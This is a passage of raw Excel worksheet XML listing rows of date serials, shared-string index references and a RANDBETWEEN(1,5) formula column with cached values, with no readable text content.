        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23088" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23088" s="1">
        <v>43027.353067129632</v>
      </c>
      <c r="C23088" t="s">
        <v>48</v>
      </c>
      <c r="E23088" t="s">
        <v>20874</v>
      </c>
      <c r="F23088">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23089" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23089" s="1">
        <v>43027.325833333336</v>
      </c>
      <c r="C23089" t="s">
        <v>344</v>
      </c>
      <c r="E23089" s="2" t="s">
        <v>20875</v>
      </c>
      <c r="F23089">
        <f t="shared" ca="1" si="360"/>
        <v>5</v>
      </c>
    </row>
    <row r="23090" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23090" s="1">
        <v>43027.280081018522</v>
      </c>
      <c r="C23090" t="s">
        <v>48</v>
      </c>
      <c r="E23090" t="s">
        <v>20876</v>
      </c>
      <c r="F23090">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23091" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23091" s="1">
        <v>43027.271631944444</v>
      </c>
      <c r="C23091" t="s">
        <v>60</v>
      </c>
      <c r="E23091" s="2" t="s">
        <v>20877</v>
      </c>
      <c r="F23091">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23092" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23092" s="1">
        <v>43027.26189814815</v>
      </c>
      <c r="C23092" t="s">
        <v>71</v>
      </c>
      <c r="E23092" t="s">
        <v>20878</v>
      </c>
      <c r="F23092">
        <f t="shared" ca="1" si="360"/>
        <v>3</v>
      </c>
    </row>
    <row r="23093" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23093" s="1">
        <v>43027.203657407408</v>
      </c>
      <c r="C23093" t="s">
        <v>65</v>
      </c>
      <c r="E23093" s="2" t="s">
        <v>20879</v>
      </c>
      <c r="F23093">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23094" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23094" s="1">
        <v>43027.183912037035</v>
      </c>
      <c r="C23094" t="s">
        <v>48</v>
      </c>
      <c r="E23094" s="2" t="s">
        <v>20880</v>
      </c>
      <c r="F23094">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23095" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23095" s="1">
        <v>43027.123854166668</v>
      </c>
      <c r="C23095" t="s">
        <v>559</v>
      </c>
      <c r="E23095" t="s">
        <v>20881</v>
      </c>
      <c r="F23095">
        <f t="shared" ca="1" si="360"/>
        <v>3</v>
      </c>
    </row>
    <row r="23096" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23096" s="1">
        <v>43027.063715277778</v>
      </c>
      <c r="C23096" t="s">
        <v>41</v>
      </c>
      <c r="E23096" t="s">
        <v>20882</v>
      </c>
      <c r="F23096">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23097" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A23097" s="1">
        <v>43027.024201388886</v>
      </c>
      <c r="C23097" t="s">
        <v>10</v>
      </c>
      <c r="D23097" t="s">
        <v>52</v>
      </c>
      <c r="E23097" s="2" t="s">
        <v>20883</v>
      </c>
      <c r="F23097">
        <f t="shared" ca="1" si="360"/>
        <v>3</v>
      </c>
    </row>
    <row r="23098" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23098" s="1">
        <v>43026.961782407408</v>
      </c>
      <c r="C23098" t="s">
        <v>10</v>
      </c>
      <c r="D23098" t="s">
        <v>80</v>
      </c>
      <c r="E23098" t="s">
        <v>20884</v>
      </c>
      <c r="F23098">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23099" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23099" s="1">
        <v>43026.922291666669</v>
      </c>
      <c r="C23099" t="s">
        <v>16</v>
      </c>
      <c r="E23099" s="2" t="s">
        <v>20885</v>
      </c>
      <c r="F23099">
        <f t="shared" ca="1" si="360"/>
        <v>4</v>
      </c>
    </row>
    <row r="23100" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23100" s="1">
        <v>43026.795277777775</v>
      </c>
      <c r="C23100" t="s">
        <v>10</v>
      </c>
      <c r="D23100" t="s">
        <v>6</v>
      </c>
      <c r="E23100" s="2" t="s">
        <v>20886</v>
      </c>
      <c r="F23100">
        <f t="shared" ca="1" si="360"/>
        <v>4</v>
      </c>
    </row>
    <row r="23101" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23101" s="1">
        <v>43026.754687499997</v>
      </c>
      <c r="C23101" t="s">
        <v>10</v>
      </c>
      <c r="D23101" t="s">
        <v>52</v>
      </c>
      <c r="E23101" t="s">
        <v>20887</v>
      </c>
      <c r="F23101">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23102" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23102" s="1">
        <v>43026.747233796297</v>
      </c>
      <c r="C23102" t="s">
        <v>10</v>
      </c>
      <c r="D23102" t="s">
        <v>192</v>
      </c>
      <c r="E23102" t="s">
        <v>20888</v>
      </c>
      <c r="F23102">
        <f t="shared" ca="1" si="360"/>
        <v>3</v>
      </c>
    </row>
    <row r="23103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23103" s="1">
        <v>43026.744490740741</v>
      </c>
      <c r="C23103" t="s">
        <v>10</v>
      </c>
      <c r="D23103" t="s">
        <v>494</v>
      </c>
      <c r="E23103" t="s">
        <v>20889</v>
      </c>
      <c r="F23103">
        <f t="shared" ca="1" si="360"/>
        <v>3</v>
      </c>
    </row>
    <row r="23104" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23104" s="1">
        <v>43026.715891203705</v>
      </c>
      <c r="C23104" t="s">
        <v>10</v>
      </c>
      <c r="D23104" t="s">
        <v>6</v>
      </c>
      <c r="E23104" s="2" t="s">
        <v>20890</v>
      </c>
      <c r="F23104">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23105" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23105" s="1">
        <v>43026.713287037041</v>
      </c>
      <c r="C23105" t="s">
        <v>10</v>
      </c>
      <c r="D23105" t="s">
        <v>158</v>
      </c>
      <c r="E23105" t="s">
        <v>20891</v>
      </c>
      <c r="F23105">
        <f t="shared" ca="1" si="360"/>
        <v>5</v>
      </c>
    </row>
    <row r="23106" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23106" s="1">
        <v>43026.635000000002</v>
      </c>
      <c r="C23106" t="s">
        <v>10</v>
      </c>
      <c r="D23106" t="s">
        <v>52</v>
      </c>
      <c r="E23106" t="s">
        <v>20892</v>
      </c>
      <c r="F23106">
        <f t="shared" ref="F23106:F23169" ca="1" si="361">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="23107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23107" s="1">
        <v>43026.620405092595</v>
      </c>
      <c r="C23107" t="s">
        <v>10</v>
      </c>
      <c r="D23107" t="s">
        <v>20</v>
      </c>
      <c r="E23107" t="s">
        <v>20893</v>
      </c>
      <c r="F23107">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23108" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23108" s="1">
        <v>43026.615671296298</v>
      </c>
      <c r="C23108" t="s">
        <v>10</v>
      </c>
      <c r="E23108" t="s">
        <v>20894</v>
      </c>
      <c r="F23108">
        <f t="shared" ca="1" si="361"/>
        <v>4</v>
      </c>
    </row>
    <row r="23109" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23109" s="1">
        <v>43026.601956018516</v>
      </c>
      <c r="C23109" t="s">
        <v>10</v>
      </c>
      <c r="D23109" t="s">
        <v>86</v>
      </c>
      <c r="E23109" t="s">
        <v>20895</v>
      </c>
      <c r="F23109">
        <f t="shared" ca="1" si="361"/>
        <v>5</v>
      </c>
    </row>
    <row r="23110" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23110" s="1">
        <v>43026.593356481484</v>
      </c>
      <c r="C23110" t="s">
        <v>10</v>
      </c>
      <c r="D23110" t="s">
        <v>107</v>
      </c>
      <c r="E23110" t="s">
        <v>20896</v>
      </c>
      <c r="F23110">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23111" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23111" s="1">
        <v>43026.589097222219</v>
      </c>
      <c r="C23111" t="s">
        <v>10</v>
      </c>
      <c r="D23111" t="s">
        <v>14</v>
      </c>
      <c r="E23111" t="s">
        <v>20897</v>
      </c>
      <c r="F23111">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23112" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23112" s="1">
        <v>43026.58798611111</v>
      </c>
      <c r="C23112" t="s">
        <v>10</v>
      </c>
      <c r="D23112" t="s">
        <v>89</v>
      </c>
      <c r="E23112" t="s">
        <v>20898</v>
      </c>
      <c r="F23112">
        <f t="shared" ca="1" si="361"/>
        <v>5</v>
      </c>
    </row>
    <row r="23113" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23113" s="1">
        <v>43026.586956018517</v>
      </c>
      <c r="C23113" t="s">
        <v>10</v>
      </c>
      <c r="D23113" t="s">
        <v>86</v>
      </c>
      <c r="E23113" t="s">
        <v>20899</v>
      </c>
      <c r="F23113">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23114" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23114" s="1">
        <v>43026.568796296298</v>
      </c>
      <c r="C23114" t="s">
        <v>71</v>
      </c>
      <c r="E23114" s="2" t="s">
        <v>20900</v>
      </c>
      <c r="F23114">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23115" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23115" s="1">
        <v>43026.527384259258</v>
      </c>
      <c r="C23115" t="s">
        <v>10</v>
      </c>
      <c r="D23115" t="s">
        <v>36</v>
      </c>
      <c r="E23115" t="s">
        <v>20901</v>
      </c>
      <c r="F23115">
        <f t="shared" ca="1" si="361"/>
        <v>4</v>
      </c>
    </row>
    <row r="23116" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23116" s="1">
        <v>43026.504837962966</v>
      </c>
      <c r="C23116" t="s">
        <v>10</v>
      </c>
      <c r="D23116" t="s">
        <v>17</v>
      </c>
      <c r="E23116" t="s">
        <v>20902</v>
      </c>
      <c r="F23116">
        <f t="shared" ca="1" si="361"/>
        <v>5</v>
      </c>
    </row>
    <row r="23117" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23117" s="1">
        <v>43026.500844907408</v>
      </c>
      <c r="C23117" t="s">
        <v>10</v>
      </c>
      <c r="D23117" t="s">
        <v>89</v>
      </c>
      <c r="E23117" t="s">
        <v>20903</v>
      </c>
      <c r="F23117">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23118" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23118" s="1">
        <v>43026.500405092593</v>
      </c>
      <c r="C23118" t="s">
        <v>15594</v>
      </c>
      <c r="D23118" t="s">
        <v>713</v>
      </c>
      <c r="E23118" s="2" t="s">
        <v>20904</v>
      </c>
      <c r="F23118">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23119" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23119" s="1">
        <v>43026.48978009259</v>
      </c>
      <c r="C23119" t="s">
        <v>10</v>
      </c>
      <c r="D23119" t="s">
        <v>89</v>
      </c>
      <c r="E23119" t="s">
        <v>20905</v>
      </c>
      <c r="F23119">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23120" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23120" s="1">
        <v>43026.487164351849</v>
      </c>
      <c r="C23120" t="s">
        <v>10</v>
      </c>
      <c r="D23120" t="s">
        <v>6</v>
      </c>
      <c r="E23120" s="2" t="s">
        <v>20906</v>
      </c>
      <c r="F23120">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23121" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23121" s="1">
        <v>43026.480844907404</v>
      </c>
      <c r="C23121" t="s">
        <v>6</v>
      </c>
      <c r="D23121" t="s">
        <v>114</v>
      </c>
      <c r="E23121" s="2" t="s">
        <v>20907</v>
      </c>
      <c r="F23121">
        <f t="shared" ca="1" si="361"/>
        <v>5</v>
      </c>
    </row>
    <row r="23122" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23122" s="1">
        <v>43026.456458333334</v>
      </c>
      <c r="C23122" t="s">
        <v>10</v>
      </c>
      <c r="D23122" t="s">
        <v>163</v>
      </c>
      <c r="E23122" t="s">
        <v>20908</v>
      </c>
      <c r="F23122">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23123" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23123" s="1">
        <v>43026.447812500002</v>
      </c>
      <c r="C23123" t="s">
        <v>2545</v>
      </c>
      <c r="E23123" s="2" t="s">
        <v>20909</v>
      </c>
      <c r="F23123">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23124" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23124" s="1">
        <v>43026.422719907408</v>
      </c>
      <c r="C23124" t="s">
        <v>836</v>
      </c>
      <c r="E23124" s="2" t="s">
        <v>20910</v>
      </c>
      <c r="F23124">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23125" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A23125" s="1">
        <v>43026.420277777775</v>
      </c>
      <c r="C23125" t="s">
        <v>3049</v>
      </c>
      <c r="E23125" s="2" t="s">
        <v>20911</v>
      </c>
      <c r="F23125">
        <f t="shared" ca="1" si="361"/>
        <v>4</v>
      </c>
    </row>
    <row r="23126" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23126" s="1">
        <v>43026.413668981484</v>
      </c>
      <c r="C23126" t="s">
        <v>197</v>
      </c>
      <c r="E23126" t="s">
        <v>20912</v>
      </c>
      <c r="F23126">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23127" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23127" s="1">
        <v>43026.412662037037</v>
      </c>
      <c r="C23127" t="s">
        <v>10</v>
      </c>
      <c r="D23127" t="s">
        <v>17</v>
      </c>
      <c r="E23127" t="s">
        <v>20913</v>
      </c>
      <c r="F23127">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23128" s="1">
        <v>43026.412581018521</v>
      </c>
      <c r="C23128" t="s">
        <v>197</v>
      </c>
      <c r="F23128">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23129" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23129" s="1">
        <v>43026.409398148149</v>
      </c>
      <c r="C23129" t="s">
        <v>10</v>
      </c>
      <c r="D23129" t="s">
        <v>71</v>
      </c>
      <c r="E23129" t="s">
        <v>20914</v>
      </c>
      <c r="F23129">
        <f t="shared" ca="1" si="361"/>
        <v>5</v>
      </c>
    </row>
    <row r="23130" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23130" s="1">
        <v>43026.395856481482</v>
      </c>
      <c r="C23130" t="s">
        <v>10</v>
      </c>
      <c r="D23130" t="s">
        <v>163</v>
      </c>
      <c r="E23130" t="s">
        <v>20915</v>
      </c>
      <c r="F23130">
        <f t="shared" ca="1" si="361"/>
        <v>4</v>
      </c>
    </row>
    <row r="23131" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23131" s="1">
        <v>43026.394513888888</v>
      </c>
      <c r="C23131" t="s">
        <v>48</v>
      </c>
      <c r="E23131" t="s">
        <v>20916</v>
      </c>
      <c r="F23131">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23132" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23132" s="1">
        <v>43026.392731481479</v>
      </c>
      <c r="C23132" t="s">
        <v>10</v>
      </c>
      <c r="D23132" t="s">
        <v>86</v>
      </c>
      <c r="E23132" t="s">
        <v>20917</v>
      </c>
      <c r="F23132">
        <f t="shared" ca="1" si="361"/>
        <v>5</v>
      </c>
    </row>
    <row r="23133" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23133" s="1">
        <v>43026.380462962959</v>
      </c>
      <c r="C23133" t="s">
        <v>10</v>
      </c>
      <c r="D23133" t="s">
        <v>86</v>
      </c>
      <c r="E23133" t="s">
        <v>20918</v>
      </c>
      <c r="F23133">
        <f t="shared" ca="1" si="361"/>
        <v>5</v>
      </c>
    </row>
    <row r="23134" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23134" s="1">
        <v>43026.380300925928</v>
      </c>
      <c r="C23134" t="s">
        <v>41</v>
      </c>
      <c r="E23134" t="s">
        <v>20919</v>
      </c>
      <c r="F23134">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23135" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23135" s="1">
        <v>43026.378657407404</v>
      </c>
      <c r="C23135" t="s">
        <v>48</v>
      </c>
      <c r="E23135" t="s">
        <v>20920</v>
      </c>
      <c r="F23135">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23136" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23136" s="1">
        <v>43026.372523148151</v>
      </c>
      <c r="C23136" t="s">
        <v>65</v>
      </c>
      <c r="E23136" s="2" t="s">
        <v>20921</v>
      </c>
      <c r="F23136">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23137" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A23137" s="1">
        <v>43026.362905092596</v>
      </c>
      <c r="C23137" t="s">
        <v>71</v>
      </c>
      <c r="E23137" s="2" t="s">
        <v>20922</v>
      </c>
      <c r="F23137">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23138" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A23138" s="1">
        <v>43026.344409722224</v>
      </c>
      <c r="C23138" t="s">
        <v>10</v>
      </c>
      <c r="D23138" t="s">
        <v>86</v>
      </c>
      <c r="E23138" s="2" t="s">
        <v>20923</v>
      </c>
      <c r="F23138">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23139" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A23139" s="1">
        <v>43026.280358796299</v>
      </c>
      <c r="C23139" t="s">
        <v>41</v>
      </c>
      <c r="E23139" s="2" t="s">
        <v>20924</v>
      </c>
      <c r="F23139">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23140" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23140" s="1">
        <v>43026.256643518522</v>
      </c>
      <c r="C23140" t="s">
        <v>471</v>
      </c>
      <c r="E23140" s="2" t="s">
        <v>20925</v>
      </c>
      <c r="F23140">
        <f t="shared" ca="1" si="361"/>
        <v>4</v>
      </c>
    </row>
    <row r="23141" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23141" s="1">
        <v>43026.220995370371</v>
      </c>
      <c r="C23141" t="s">
        <v>71</v>
      </c>
      <c r="D23141" t="s">
        <v>312</v>
      </c>
      <c r="E23141" s="2" t="s">
        <v>20926</v>
      </c>
      <c r="F23141">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23142" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23142" s="1">
        <v>43026.21875</v>
      </c>
      <c r="C23142" t="s">
        <v>71</v>
      </c>
      <c r="D23142" t="s">
        <v>312</v>
      </c>
      <c r="F23142">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23143" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23143" s="1">
        <v>43026.214375000003</v>
      </c>
      <c r="C23143" t="s">
        <v>71</v>
      </c>
      <c r="E23143" s="2" t="s">
        <v>20927</v>
      </c>
      <c r="F23143">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23144" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23144" s="1">
        <v>43026.194374999999</v>
      </c>
      <c r="C23144" t="s">
        <v>139</v>
      </c>
      <c r="D23144" t="s">
        <v>312</v>
      </c>
      <c r="E23144" t="s">
        <v>20928</v>
      </c>
      <c r="F23144">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23145" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A23145" s="1">
        <v>43026.193495370368</v>
      </c>
      <c r="C23145" t="s">
        <v>471</v>
      </c>
      <c r="E23145" s="2" t="s">
        <v>20929</v>
      </c>
      <c r="F23145">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23146" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23146" s="1">
        <v>43026.188321759262</v>
      </c>
      <c r="C23146" t="s">
        <v>10</v>
      </c>
      <c r="D23146" t="s">
        <v>17</v>
      </c>
      <c r="E23146" s="2" t="s">
        <v>20930</v>
      </c>
      <c r="F23146">
        <f t="shared" ca="1" si="361"/>
        <v>4</v>
      </c>
    </row>
    <row r="23147" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23147" s="1">
        <v>43026.182974537034</v>
      </c>
      <c r="C23147" t="s">
        <v>103</v>
      </c>
      <c r="E23147" s="2" t="s">
        <v>20931</v>
      </c>
      <c r="F23147">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23148" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23148" s="1">
        <v>43026.163958333331</v>
      </c>
      <c r="C23148" t="s">
        <v>535</v>
      </c>
      <c r="E23148" s="2" t="s">
        <v>20932</v>
      </c>
      <c r="F23148">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23149" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23149" s="1">
        <v>43026.163726851853</v>
      </c>
      <c r="C23149" t="s">
        <v>260</v>
      </c>
      <c r="E23149" s="2" t="s">
        <v>20933</v>
      </c>
      <c r="F23149">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23150" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23150" s="1">
        <v>43026.148923611108</v>
      </c>
      <c r="C23150" t="s">
        <v>140</v>
      </c>
      <c r="D23150" t="s">
        <v>46</v>
      </c>
      <c r="E23150" t="s">
        <v>20934</v>
      </c>
      <c r="F23150">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23151" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23151" s="1">
        <v>43026.119780092595</v>
      </c>
      <c r="C23151" t="s">
        <v>10</v>
      </c>
      <c r="D23151" t="s">
        <v>6</v>
      </c>
      <c r="E23151" s="2" t="s">
        <v>20935</v>
      </c>
      <c r="F23151">
        <f t="shared" ca="1" si="361"/>
        <v>4</v>
      </c>
    </row>
    <row r="23152" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23152" s="1">
        <v>43026.083194444444</v>
      </c>
      <c r="C23152" t="s">
        <v>10</v>
      </c>
      <c r="D23152" t="s">
        <v>6</v>
      </c>
      <c r="E23152" t="s">
        <v>20936</v>
      </c>
      <c r="F23152">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23153" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A23153" s="1">
        <v>43026.067986111113</v>
      </c>
      <c r="C23153" t="s">
        <v>71</v>
      </c>
      <c r="E23153" s="2" t="s">
        <v>20937</v>
      </c>
      <c r="F23153">
        <f t="shared" ca="1" si="361"/>
        <v>4</v>
      </c>
    </row>
    <row r="23154" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23154" s="1">
        <v>43026.054710648146</v>
      </c>
      <c r="C23154" t="s">
        <v>140</v>
      </c>
      <c r="D23154" t="s">
        <v>141</v>
      </c>
      <c r="E23154" s="2" t="s">
        <v>20938</v>
      </c>
      <c r="F23154">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23155" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23155" s="1">
        <v>43025.93277777778</v>
      </c>
      <c r="C23155" t="s">
        <v>10</v>
      </c>
      <c r="D23155" t="s">
        <v>14</v>
      </c>
      <c r="E23155" t="s">
        <v>20939</v>
      </c>
      <c r="F23155">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23156" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23156" s="1">
        <v>43025.839074074072</v>
      </c>
      <c r="C23156" t="s">
        <v>3027</v>
      </c>
      <c r="E23156" s="2" t="s">
        <v>20940</v>
      </c>
      <c r="F23156">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23157" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23157" s="1">
        <v>43025.787719907406</v>
      </c>
      <c r="C23157" t="s">
        <v>10</v>
      </c>
      <c r="D23157" t="s">
        <v>80</v>
      </c>
      <c r="E23157" s="2" t="s">
        <v>20941</v>
      </c>
      <c r="F23157">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23158" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23158" s="1">
        <v>43025.766481481478</v>
      </c>
      <c r="C23158" t="s">
        <v>10</v>
      </c>
      <c r="D23158" t="s">
        <v>632</v>
      </c>
      <c r="E23158" t="s">
        <v>20942</v>
      </c>
      <c r="F23158">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23159" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23159" s="1">
        <v>43025.766296296293</v>
      </c>
      <c r="C23159" t="s">
        <v>10</v>
      </c>
      <c r="D23159" t="s">
        <v>632</v>
      </c>
      <c r="E23159" t="s">
        <v>20942</v>
      </c>
      <c r="F23159">
        <f t="shared" ca="1" si="361"/>
        <v>5</v>
      </c>
    </row>
    <row r="23160" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23160" s="1">
        <v>43025.725347222222</v>
      </c>
      <c r="C23160" t="s">
        <v>10</v>
      </c>
      <c r="D23160" t="s">
        <v>36</v>
      </c>
      <c r="E23160" s="2" t="s">
        <v>20943</v>
      </c>
      <c r="F23160">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23161" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23161" s="1">
        <v>43025.724768518521</v>
      </c>
      <c r="C23161" t="s">
        <v>10</v>
      </c>
      <c r="D23161" t="s">
        <v>330</v>
      </c>
      <c r="E23161" t="s">
        <v>20944</v>
      </c>
      <c r="F23161">
        <f t="shared" ca="1" si="361"/>
        <v>4</v>
      </c>
    </row>
    <row r="23162" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A23162" s="1">
        <v>43025.719722222224</v>
      </c>
      <c r="C23162" t="s">
        <v>10</v>
      </c>
      <c r="D23162" t="s">
        <v>46</v>
      </c>
      <c r="E23162" s="2" t="s">
        <v>20945</v>
      </c>
      <c r="F23162">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23163" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A23163" s="1">
        <v>43025.692453703705</v>
      </c>
      <c r="C23163" t="s">
        <v>6</v>
      </c>
      <c r="D23163" t="s">
        <v>25</v>
      </c>
      <c r="E23163" s="2" t="s">
        <v>20946</v>
      </c>
      <c r="F23163">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
    <row r="23164" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23164" s="1">
        <v>43025.679965277777</v>
      </c>
      <c r="C23164" t="s">
        <v>10</v>
      </c>
      <c r="D23164" t="s">
        <v>14</v>
      </c>
      <c r="E23164" s="2" t="s">
        <v>20947</v>
      </c>
      <c r="F23164">
        <f t="shared" ca="1" si="361"/>
        <v>5</v>
      </c>
    </row>
    <row r="23165" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23165" s="1">
        <v>43025.670092592591</v>
      </c>
      <c r="C23165" t="s">
        <v>10</v>
      </c>
      <c r="D23165" t="s">
        <v>817</v>
      </c>
      <c r="E23165" t="s">
        <v>20948</v>
      </c>
      <c r="F23165">
        <f t="shared" ca="1" si="361"/>
        <v>2</v>
      </c>
    </row>
